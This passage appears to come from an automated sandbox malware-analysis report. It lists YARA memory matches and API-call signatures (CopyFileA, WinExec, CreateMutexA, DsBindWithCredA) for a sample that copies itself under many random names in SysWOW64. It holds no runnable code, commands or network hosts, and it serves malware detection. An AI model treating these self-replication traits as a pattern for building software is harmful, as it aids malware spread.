                      Source: Yara matchFile source: Process Memory Space: Odekfoij.exe PID: 6928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ojacofgb.exe PID: 6992, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ppllkpoo.exe PID: 7064, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Plbmqa32.exe PID: 7092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Plgflqpn.exe PID: 7084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Pqeoao32.exe PID: 3808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Qgcpihjl.exe PID: 2896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ajkolbad.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bmlhnnne.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bgamkfnl.exe PID: 2924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bqjacldl.exe PID: 2256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bnnampcf.exe PID: 5640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bnpnbp32.exe PID: 6188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bgibkegc.exe PID: 1740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Baagdk32.exe PID: 916, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cfnpmb32.exe PID: 1188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ccapffke.exe PID: 7104, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ceampi32.exe PID: 6460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cnjaioih.exe PID: 4284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Camgpi32.exe PID: 7180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dmfdkj32.exe PID: 7196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dnhmjm32.exe PID: 7212, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dfcboo32.exe PID: 7228, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Edgbhcim.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Emogai32.exe PID: 7260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Efgkjnfn.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Eoappk32.exe PID: 7292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Fkogfkdj.exe PID: 7312, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Fhedeo32.exe PID: 7328, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Feidnc32.exe PID: 7344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Foaigifk.exe PID: 7368, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,0_2_00403619
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,0_2_00406C29
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_0040129B DsBindWithCredA,CreateFileA,0_2_0040129B
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,0_2_0040129C
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,0_2_00406753
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,1_2_00403619
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,1_2_00406C29
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_0040129B DsBindWithCredA,CreateFileA,1_2_0040129B
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,1_2_0040129C
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,1_2_00406753
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,2_2_00403619
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,2_2_00406C29
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_0040129B DsBindWithCredA,CreateFileA,2_2_0040129B
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,2_2_0040129C
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,2_2_00406753
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,3_2_00403619
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,3_2_00406C29
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_0040129B DsBindWithCredA,CreateFileA,3_2_0040129B
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,3_2_0040129C
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,3_2_00406753
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,4_2_00403619
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,4_2_00406C29
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_0040129B DsBindWithCredA,CreateFileA,4_2_0040129B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,4_2_0040129C
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,4_2_00406753
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,5_2_00403619
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,5_2_00406C29
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_0040129B DsBindWithCredA,CreateFileA,5_2_0040129B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,5_2_0040129C
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,5_2_00406753
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,6_2_00403619
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,6_2_00406C29
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_0040129B DsBindWithCredA,CreateFileA,6_2_0040129B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,6_2_0040129C
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,6_2_00406753
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,7_2_00403619
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,7_2_00406C29
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_0040129B DsBindWithCredA,CreateFileA,7_2_0040129B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,7_2_0040129C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,7_2_00406753
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,8_2_00403619
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,8_2_00406C29
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_0040129B DsBindWithCredA,CreateFileA,8_2_0040129B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,8_2_0040129C
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,8_2_00406753
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 9_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,9_2_00403619
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 9_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,9_2_00406C29
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 9_2_0040129B DsBindWithCredA,CreateFileA,9_2_0040129B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 9_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,9_2_0040129C
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 9_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,9_2_00406753
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 10_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,10_2_00403619
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 10_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,10_2_00406C29
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 10_2_0040129B DsBindWithCredA,CreateFileA,10_2_0040129B
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 10_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,10_2_0040129C
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 10_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,10_2_00406753
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 11_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,11_2_00403619
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 11_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,11_2_00406C29
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 11_2_0040129B DsBindWithCredA,CreateFileA,11_2_0040129B
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 11_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,11_2_0040129C
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 11_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,11_2_00406753
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 12_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,12_2_00403619
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 12_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,12_2_00406C29
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 12_2_0040129B DsBindWithCredA,CreateFileA,12_2_0040129B
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 12_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,12_2_0040129C
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 12_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,12_2_00406753
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: 13_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,13_2_00403619
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: 13_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,13_2_00406C29
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: 13_2_0040129B DsBindWithCredA,CreateFileA,13_2_0040129B
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: 13_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,13_2_0040129C
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: 13_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,13_2_00406753
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: 14_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,14_2_00403619
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: 14_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,14_2_00406C29
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: 14_2_0040129B DsBindWithCredA,CreateFileA,14_2_0040129B
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: 14_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,14_2_0040129C
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: 14_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,14_2_00406753
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: 15_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,15_2_00403619
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: 15_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,15_2_00406C29
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: 15_2_0040129B DsBindWithCredA,CreateFileA,15_2_0040129B
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: 15_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,15_2_0040129C
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: 15_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,15_2_00406753
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: 16_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,16_2_00403619
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: 16_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,16_2_00406C29
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: 16_2_0040129B DsBindWithCredA,CreateFileA,16_2_0040129B
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: 16_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,16_2_0040129C
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: 16_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,16_2_00406753
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: 17_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,17_2_00403619
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: 17_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,17_2_00406C29
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: 17_2_0040129B DsBindWithCredA,CreateFileA,17_2_0040129B
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: 17_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,17_2_0040129C
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: 17_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,17_2_00406753
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: 18_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,18_2_00403619
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: 18_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,18_2_00406C29
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: 18_2_0040129B DsBindWithCredA,CreateFileA,18_2_0040129B
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: 18_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,18_2_0040129C
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: 18_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,18_2_00406753
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: 19_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,19_2_00403619
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: 19_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,19_2_00406C29
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: 19_2_0040129B DsBindWithCredA,CreateFileA,19_2_0040129B
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: 19_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,19_2_0040129C
